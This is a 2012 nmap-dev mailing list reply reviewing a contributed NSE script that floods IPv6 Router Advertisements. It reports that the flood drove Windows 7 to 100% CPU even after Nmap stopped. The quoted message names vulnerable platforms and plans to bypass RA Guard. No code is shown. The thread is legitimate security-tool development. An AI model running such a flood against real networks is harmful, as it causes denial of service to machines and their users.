Re: [NSE script] IPv6 RA flood

[David Fifield <david () bamsoftware com>]

On Sat, May 05, 2012 at 05:49:52PM +0200, Adam Števko wrote:
> Hi guys,
>
> IPv6 deployment is on the rise and there are some protocol
> vulnerabilities. One of them is flooding network with Router
> Advertisments causing machines to recompute route table entries
> leading to 100% CPU utilization.  Based on my testing, I found these
> platforms vulnerable: Windows (was unusable), Solaris (was usable, but
> the console lagged a bit). Linux and FreeBSD were unaffected (issue
> was fixed few days later it was announced). This work is inspired by
> THC IPv6 suite. 
>
> In the future I would like to add support for packet fragmentation and
> giving ability to bypass RA Guard, work on more NSE scripts inspired
> by tools from THC IPv6 suite and commit them to nmap script library.
>
> Script URL: https://bitbucket.org/xenol/nse-scripts/src/0c9b7397daeb/ipv6-ra-flood.nse

Hi Adam. I'm sorry this script has been ignored for so long.

I changed the script's imports to run under Lua 5.2 and tried it. It
pegged a Windows 7 CPU at 100% almost immediately, and continued to do
so after I killed the Nmap process. It works as advertised.

I'd like to add this script if you'll make just a few simple changes.
Update the code to Lua 5.2; this may be as simple as changing the
require statements. A guide is here: https://secwiki.org/w/Nmap/Lua_5.2.
Don't just choose the first interface from the list if no argument was
given; abort the script. See the prerule of url-snarf for an example.

Since the effect, at least on Windows 7, appears to be persistent, do
you think the script should have a default time limit? It wouldn't be
the first script that runs forever, but I think people are still
surprised when a script does that.

David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/